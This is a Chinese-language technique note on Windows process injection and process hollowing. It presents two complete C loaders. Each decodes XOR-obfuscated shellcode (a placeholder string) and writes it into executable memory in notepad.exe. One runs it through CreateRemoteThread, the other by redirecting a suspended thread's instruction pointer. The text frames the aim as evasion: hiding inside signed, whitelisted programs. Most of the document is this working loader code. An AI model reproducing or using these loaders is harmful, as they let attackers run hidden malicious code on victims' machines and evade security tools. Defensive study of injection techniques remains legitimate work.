进程注入_AND_ProcessHollowing

远线程注入

注入到带有签名的白名单程序中

#include <stdio.h>
#include <windows.h>
#include <TlHelp32.h>
unsigned char buf[] = "异或后的shellcode";

INT FoundPid(const wchar_t* szName) {
	// 设置变量
	PROCESSENTRY32 pe = { 0 };
	HANDLE hSnapShot = NULL;
	int pid = 0;
	// 初始化大小
	pe.dwSize = sizeof(PROCESSENTRY32);
	// 创建进程快照
	hSnapShot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
	if (hSnapShot != INVALID_HANDLE_VALUE) {
		// 获取快照
		BOOL Process = Process32First(hSnapShot, &pe);
		if (!Process) {
			return -1;
		}
		// 遍历快照
		while (Process32Next(hSnapShot, &pe)) {
			// 判断进程名是否相同
			if (!_wcsicmp(szName, pe.szExeFile)) {
				pid = pe.th32ProcessID;
				printf("[+] 找到指定进程pid: %d\n", pe.th32ProcessID);
				break;
			}
		}
		CloseHandle(hSnapShot);
		return pid;
	}
	else {
		printf("[-] 进程快照创建失败!\t错误值: %d\n", GetLastError());
		return -1;
	}
}

void InjectShellCode(const wchar_t* szName)
{
	HANDLE Handle, remoteThread;
	PVOID remoteBuffer;
	int Pid = FoundPid(szName);
	Handle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, Pid);
	// 还原异或
	for (int i = 0; i < sizeof(buf); i++) {
		buf[i] ^= 50;
	}
	remoteBuffer = VirtualAllocEx(Handle, NULL, sizeof(buf), (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE);
	WriteProcessMemory(Handle, remoteBuffer, buf, sizeof(buf), NULL);
	remoteThread = CreateRemoteThread(Handle, NULL, 0, (LPTHREAD_START_ROUTINE)remoteBuffer, NULL, 0, NULL);
	CloseHandle(Handle);
}


int main(int argc, char *argv[])
{
	InjectShellCode(L"notepad.exe");
	return 0;
}

傀儡进程 Process Hollowing

傀儡进程：创建一个进程，然后将其虚拟地址里的内容掏空，注入想要注入的进程，以达到掩人耳目的效果

1. 创建挂起进程 CreateProcess(PATH_TO_HOST_EXE, ..., CREATE_SUSPENDED, ...) 便可创建一个挂起状态的进程.
1. 获取进程上下文结构使用 GetThreadContext() 获取进程上下文（寄存器状态）
1. 写入傀儡进程(申请内存空间，写入shellcode) VirtualAllocEx() 重新分配空间大小为傀儡进程的大小，WriteProcessMemory() 向分配的空间写入傀儡进程.
1. 恢复现场(设置上下文，恢复线程) 由于目标进程和傀儡进程的入口点一般不同，所以在恢复前需要更改线程入口点，使用 SetThreadContext 函数，最后使用 ResumeThread 函数释放运行.

#include <Windows.h>
#include <stdio.h>

unsigned char buf[] = "异或的shellcode";

BOOL ReplaceProcess(const char *pszFilePath)
{
	STARTUPINFO si = { 0 };
	PROCESS_INFORMATION pi = { 0 };
	CONTEXT threadContext = { 0 };
	BOOL bRet = FALSE;
	RtlZeroMemory(&si, sizeof(si));
	RtlZeroMemory(&pi, sizeof(pi));
	RtlZeroMemory(&threadContext, sizeof(threadContext));
	si.cb = sizeof(si);
	
	// 创建进程并挂起主线程
	bRet = CreateProcessA(pszFilePath, NULL, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi);
	if (FALSE == bRet)
	{
		printf("CreateProcess");
		return FALSE;
	}
	
	// 在替换的进程中申请一块内存
	LPVOID lpDestBaseAddr = VirtualAllocEx(pi.hProcess, NULL, sizeof(buf), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
	if (NULL == lpDestBaseAddr)
	{
		printf("VirtualAllocEx");
		return FALSE;
	}
	
	// 还原异或
	for (int i = 0; i < sizeof(buf); i++) {
		buf[i] ^= 50;
	}
	// 写入替换的数据
	bRet = WriteProcessMemory(pi.hProcess, lpDestBaseAddr, buf, sizeof(buf), NULL);
	if (FALSE == bRet)
	{
		printf("WriteProcessError");
		return FALSE;
	}
	
	// 获取线程上下文
	// 注意此处标志，一定要写!!!
	threadContext.ContextFlags = CONTEXT_FULL;
	bRet = GetThreadContext(pi.hThread, &threadContext);
	if (FALSE == bRet)
	{
		printf("GetThreadContext");
		return FALSE;
	}


	// 修改eip从新申请的内存处运行
	threadContext.Rip = (DWORD64)lpDestBaseAddr;
	// 设置挂起进程的线程上下文
	bRet = SetThreadContext(pi.hThread, &threadContext);
	if (FALSE == bRet)
	{
		printf("SetThreadContext");
		return FALSE;
	}
	// 恢复挂起的进程的线程
	ResumeThread(pi.hThread);
	WaitForSingleObject(pi.hThread, INFINITE);
	CloseHandle(pi.hThread);
	CloseHandle(pi.hProcess);
	return TRUE;
}

void main() {
	ReplaceProcess("C:\\Windows\\System32\\notepad.exe");
}

References

https://bbs.pediy.com/thread-224706.htm https://jev0n.com/2020/03/11/65.html https://www.cnblogs.com/bonelee/p/15957493.html https://juejin.cn/post/6844903587626090503#process-hollowing https://www.52pojie.cn/thread-501486-1-1.html https://github.com/m0n0ph1/Process-Hollowing